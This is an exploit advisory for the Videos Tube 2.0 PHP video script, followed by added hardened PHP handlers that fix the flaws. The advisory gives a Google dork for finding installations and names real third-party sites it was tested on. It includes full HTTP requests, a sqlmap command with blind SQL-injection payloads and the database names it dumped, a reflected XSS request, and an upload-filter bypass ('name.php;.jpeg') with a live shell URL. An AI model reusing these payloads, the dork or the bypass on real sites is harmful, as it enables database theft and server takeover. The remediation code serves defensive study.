Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author    : KnocKout
[~] Contact   : knockout@e-mail.com.tr
[~] HomePage  : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -
[+] Greetz to : http://1337day.com - http://milw00rm.com

[ASCII-art banner, not recoverable from the extracted text; credits: KnocKout, Septemb0x, BARCOD3, _UnDeRTaKeR_ / Turkey]

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App.  : Videos Tube
|~Price     : FREE
|~Version   : 2.0 (the latest updated version)
|~Software  : http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tüm Hakları Saklıdır."
|[~]Date      : "15 Nov. 2014"
|[~]Tested on : Kali Linux

Tested on Demos;
http://demo.phpscriptlerim.com/free/videostube/
http://www.tıger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/

====================== SQL Injection Vulnerability (POST Method) ===============

Example; http://demo.phpscriptlerim.com/free/videostube/
Target:  http://demo.phpscriptlerim.com/free/videostube/search.php
POST :/  search=[SQL Injection]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

search=[Post Method SQL Injection]&ara=
..
..

##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data="search=&ara=" -p "search" --dbs
####################################################

---
Place: POST
Parameter: search
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: search=-6400' OR (6785=6785)#&ara=

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube

==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================

Target:    http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

search=[XSS]&ara=

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======

INFO: first log in to the admin panel: http://www.TARGET.com/yonetim/
then go to: http://www.VICTIM.com/upload/upload.php
The upload filter is bypassed by naming the shell file "name.php;.jpeg" and submitting the request with Tamper Data; the shell was uploaded successfully in testing.

TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php
=============================================================
# milw00rm.com [2014-11-15]
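Both the SQL injection and the XSS above come from the same `search` POST parameter being concatenated into a query and then reflected unencoded into the results page. The following handler is an added example written for this page, not code from Videos Tube or from the advisory's author; the table and column names (`videos`, `id`, `title`), the DSN and credentials are placeholders, and the rest of the application's layout is assumed.

```php
<?php
// Added example (not Videos Tube's own code): a hardened search handler.
// Assumed/hypothetical: table `videos` with columns `id` and `title`;
// the DSN and credentials below are placeholders.
declare(strict_types=1);

$pdo = new PDO(
    'mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASS_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

// Accept the parameter only from POST, only as a string, and bound in length.
$search = $_POST['search'] ?? '';
if (!is_string($search) || mb_strlen($search) > 100) {
    http_response_code(400);
    exit('Invalid search term.');
}

// The input never becomes part of the SQL text: it is bound as a parameter,
// so a value such as  -6400' OR (6785=6785)#  or  ' AND SLEEP(5)#  is compared
// literally against `title` instead of being parsed as SQL.
// LIKE wildcards in the input are escaped so a user cannot widen the match.
$pattern = '%' . addcslashes($search, '%_\\') . '%';
$stmt = $pdo->prepare('SELECT id, title FROM videos WHERE title LIKE :pattern LIMIT 50');
$stmt->execute([':pattern' => $pattern]);
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

// The reflected XSS is the search term echoed back raw. Encode every
// user-controlled value for the HTML context on output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

header('Content-Type: text/html; charset=UTF-8');
echo '<p>Results for: ' . h($search) . '</p>';
echo '<ul>';
foreach ($rows as $row) {
    echo '<li><a href="video.php?id=' . (int) $row['id'] . '">' . h($row['title']) . '</a></li>';
}
echo '</ul>';
```

Two points worth checking in a real fix: emulated prepares are disabled so the MySQL server, not the driver, performs the parameter binding, and the database user behind the DSN should have only SELECT/INSERT rights on the application's own schema, so that even a remaining injection cannot read `information_schema` beyond what that account is granted.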
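The upload bypass works because the filename check runs before Tamper Data gets to edit the request, i.e. in the browser or on the client-supplied name, and the stored file keeps an attacker-chosen extension. The handler below is an added example for this page, not Videos Tube's upload.php; the form field name `resim`, the session flag used for the authorization check, and the `resimler/` target directory layout are assumptions.

```php
<?php
// Added example (not Videos Tube's own code): server-side validation for an
// image upload endpoint. Assumed/hypothetical: form field `resim`, files are
// written under ./resimler/, and $_SESSION['admin'] is the real auth check.
declare(strict_types=1);

session_start();
if (empty($_SESSION['admin'])) {   // authorization is enforced here, not only by hiding the form
    http_response_code(403);
    exit('Forbidden');
}

// Accepted image types, keyed by the MIME type sniffed from the file bytes.
const ALLOWED   = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
const MAX_BYTES = 2 * 1024 * 1024;

$f = $_FILES['resim'] ?? null;
if ($f === null || $f['error'] !== UPLOAD_ERR_OK || $f['size'] > MAX_BYTES) {
    http_response_code(400);
    exit('Upload rejected.');
}

// 1. Decide the type from the content, never from the client-supplied name or
//    Content-Type header: a file named "name.php;.jpeg" is just bytes here.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if ($mime === false || !isset(ALLOWED[$mime]) || @getimagesize($f['tmp_name']) === false) {
    http_response_code(400);
    exit('Not an image.');
}

// 2. Never reuse the original filename. Generate one and attach the extension
//    that matches the sniffed type, so ";", ".php" and path separators from the
//    client never reach the disk.
$name = bin2hex(random_bytes(8)) . '.' . ALLOWED[$mime];
$dir  = __DIR__ . '/resimler';
$dest = $dir . '/' . $name;

// 3. The target directory should additionally have script execution disabled
//    (for Apache/mod_php e.g. a .htaccess with `php_flag engine off`) or live
//    outside the web root, so a mistake in steps 1-2 still cannot execute code.
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    http_response_code(500);
    exit('Could not store file.');
}
chmod($dest, 0644);

echo 'Stored as ' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
```

The three layers are independent on purpose: content sniffing rejects non-images, server-generated names remove the client's control over the extension, and a no-execute upload directory means that even a polyglot file that passes `getimagesize` is served as data rather than run as PHP.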